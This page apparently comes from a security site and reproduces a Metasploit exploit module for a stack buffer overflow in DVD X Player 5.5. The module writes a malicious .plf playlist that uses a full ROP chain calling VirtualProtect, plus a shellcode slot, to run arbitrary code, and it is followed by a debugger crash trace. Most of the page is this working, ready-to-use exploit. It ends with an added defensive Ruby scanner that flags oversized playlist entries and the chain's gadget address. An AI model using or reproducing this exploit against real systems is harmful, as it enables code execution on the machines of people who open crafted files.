DVD X Player 5.5 .plf PlayList Buffer Overflow
Source: http://www.metasploit.com  Author: sinn3r  Published: 2011-09-05

##
# $Id: dvdx_plf_bof.rb 13673 2011-09-01 05:20:47Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info={})
  super(update_info(info,
   'Name'           => "DVD X Player 5.5 .plf PlayList Buffer Overflow",
   'Description'    => %q{
     This module exploits a stack-based buffer overflow in DVD X Player 5.5 Pro and
     Standard.  By supplying a long string of data in a .plf file (playlist), the
     MediaPlayerCtrl.dll component will attempt to extract a filename out of the string
     and then copy it onto the stack without any proper bounds checking, which causes a
     buffer overflow and results in arbitrary code execution under the context of the user.

     This module has been designed to target common Windows systems such as:
    Windows XP SP2/SP3, Windows Vista, and Windows 7.
   },
   'License'        => MSF_LICENSE,
   'Version'        => "$Revision: 13673 $",
   'Author'         =>
    [
     'n00b',      #Initial discovery, poc for 4.1
     'D3r K0n!G', #Proof-of-concept for 5.5
     'sickness',  #ROP
     'sinn3r',    #Metasploit
    ],
   'References'     =>
    [
     [ 'CVE', '2007-3068' ],
     [ 'OSVDB', '36956' ],
     [ 'BID', '24278' ],
     [ 'URL', 'http://www.exploit-db.com/exploits/17745' ],
    ],
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars' => "\x00\x0a\x0d\x1a",
     'StackAdjustment' => -3500,
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "seh",  #none/process/seh
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'DVD X Player 5.5 Standard / Pro',
      {
       'Offset' => 260,        #To EIP
       'Ret'    => 0x61626702, #POP EAX; RET [EPG.dll]
       'Max'    => 2000,       #Max buffer size
      }
     ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Jun 02 2007",
   'DefaultTarget'  => 0))

   register_options(
    [
     OptString.new('FILENAME', [false, 'The file name', 'msf.plf'])
    ], self.class)
 end

 def exploit
  rop = [
   0x10011108,  #VirtualProtect IAT [SkinScrollBar.dll]
   0x616306ed,  #MOV EAX, DWORD PTR DS:[EAX]; RET [EPG.dll]
   0x616385d8,  #XCHG EAX,ESI; RETN 0 [EPG.dll]
   0x6162d202,  #POP EBP; RET [EPG.dll]
   0x6160cac8,  #PUSH ESP [EPG.dll]
   0x61626702,  #POP EAX; RET [EPG.dll]
   0xfffffaff,  #Value to negate, will become 0x00000501 (dwSize; negation avoids null bytes)
   0x61627d9c,  #NEG EAX; RET [EPG.dll]
   0x61640124,  #XCHG EAX,EBX; RET [EPG.dll]
   0x61626702,  #POP EAX; RET [EPG.dll]
   0xffffffc0,  #Value to negate, will become 0x00000040
   0x61627d9c,  #NEG EAX; RET [EPG.dll]
   0x61608ba2,  #XCHG EAX,EDX; RET [EPG.dll]
   0x6160b804,  #POP ECX; RET [EPG.dll]
   0x6164b001,  #Writable location [EPG.dll]
   0x6162e587,  #POP EDI; RET [EPG.dll]
   0x6163081d,  #ROP NOP  [EPG.dll]
   0x61626702,  #POP EAX; RET [EPG.dll]
   0x90909090,  #Pushed as EAX by PUSHAD; executes as NOPs once VirtualProtect returns
   0x61620831,  #PUSHAD; RET [EPG.dll]
  ].pack('V*')

  buf  = ''
  buf << rand_text_alpha(target['Offset'])
  buf << [target.ret].pack('V')
  buf << rand_text_alpha(16)
  buf << rop
  buf << make_nops(15)
  buf << payload.encoded
  buf << rand_text_alpha(target['Max']-buf.length)

  print_status("Creating #{datastore['FILENAME']}...")
  file_create(buf)
 end
end

=begin
6400cd42 ffd3            call    ebx {SHLWAPI!PathFindFileNameA (77f6c19c)}
0:000> p
eax=0406a15c ebx=77f6c19c ecx=00001300 edx=040600d0 esi=00000001 edi=6405362c
eip=6400cd44 esp=0012f488 ebp=00eafce0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MediaPlayerCtrl+0xcd44:
6400cd44 8b8dec000000    mov     ecx,dword ptr <Unloaded_ionInfo.dll>+0xeb (000000ec)[ebp] ss:0023:00eafdcc=040600d0
0:000> dd eax
0406a15c  41414141 41414141 41414141 41414141
0406a16c  41414141 41414141 41414141 41414141
0406a17c  41414141 41414141 41414141 41414141
0406a18c  41414141 41414141 41414141 41414141
0406a19c  41414141 41414141 41414141 41414141
0406a1ac  41414141 41414141 41414141 41414141
0406a1bc  41414141 41414141 41414141 41414141
0406a1cc  41414141 41414141 41414141 41414141
0:000> g
Breakpoint 2 hit
eax=0406a15c ebx=77f6c19c ecx=040600d0 edx=040600d0 esi=00000001 edi=6405362c
eip=6400cd4e esp=0012f47c ebp=00eafce0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MediaPlayerCtrl+0xcd4e:
6400cd4e ff17            call    dword ptr [edi]      ds:0023:6405362c=6400d890
0:000> g
(464.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00001389 ebx=040600d0 ecx=00000177 edx=0406a15c esi=0406af08 edi=00130000
eip=6400dd50 esp=0012f234 ebp=00000001 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
MediaPlayerCtrl!DllCreateObject+0x220:
6400dd50 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !address 6400dd50
    64000000 : 64001000 - 0004e000
                    Type     01000000 MEM_IMAGE
                    Protect  00000020 PAGE_EXECUTE_READ
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageImage
                    FullPath C:\Program Files\Aviosoft\DVD X Player 5.5 Standard\MediaPlayerCtrl.dll
=end
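Added example, not part of the Metasploit module above or of the vulnerable product: a small Ruby scanner that flags playlist files likely to trigger this overflow, written from the defender's side. It assumes playlist entries are newline-delimited (the page does not document the .plf format, so that delimiter is an assumption), and it flags any entry longer than the module's 260-byte 'Offset' to EIP, non-printable bytes in what should be a path, and the EPG.dll gadget address the module uses as its return address. The sample inputs are constructed for the example.

```ruby
# Added example, not part of the Metasploit module: a defensive scanner for
# .plf playlists. MediaPlayerCtrl.dll copies the filename it extracts from a
# playlist entry into a fixed stack buffer, and the module overwrites EIP at
# offset 260, so an entry longer than that should never reach the player.

# POP EAX; RET gadget in EPG.dll that the module places over the saved return
# address, packed little-endian the way the module emits it.
RET_ADDR = [0x61626702].pack('V')

# The module's 'Offset' to EIP; also MAX_PATH on Windows.
MAX_ENTRY_LEN = 260

# Scan raw playlist bytes and return an array of findings (empty means clean).
# Assumption: entries are newline-delimited; the page does not document the
# .plf format. A crafted file contains no \x0a/\x0d (both are bad chars for
# this module), so it shows up here as one oversized entry.
def scan_plf(data)
  findings = []
  data.b.split(/\r?\n/).each_with_index do |entry, idx|
    next if entry.empty?
    line = idx + 1
    if entry.bytesize > MAX_ENTRY_LEN
      findings << { line: line, reason: "entry of #{entry.bytesize} bytes exceeds #{MAX_ENTRY_LEN}" }
    end
    if entry.include?(RET_ADDR)
      findings << { line: line, reason: "contains EPG.dll gadget address 0x61626702" }
    end
    nonprint = entry.bytes.count { |b| b < 0x20 || b > 0x7e }
    if nonprint > 0
      findings << { line: line, reason: "#{nonprint} non-printable bytes in a path entry" }
    end
  end
  findings
end

# Constructed sample inputs (not real files).
BENIGN_PLF = "C:\\Movies\\trailer.mkv\r\nD:\\clips\\intro.avi\r\n"
# Mimics the module's layout only: filler up to the return address, the
# gadget address, then NOP bytes. No payload is included.
CRAFTED_PLF = ("A" * MAX_ENTRY_LEN).b + RET_ADDR + ("\x90" * 15).b

if __FILE__ == $0
  [BENIGN_PLF, CRAFTED_PLF].each do |sample|
    findings = scan_plf(sample)
    puts(findings.empty? ? "clean" : findings.map { |f| "line #{f[:line]}: #{f[:reason]}" }.join("\n"))
  end
end
```

The length check is the one that generalises: it catches any playlist built along the lines of this module regardless of which gadgets or payload it carries, whereas the gadget-address check is a signature for this specific chain and would miss a re-rolled ROP chain. Run it over a directory of .plf files before they are opened in the player, or wire it into mail or download scanning.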

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved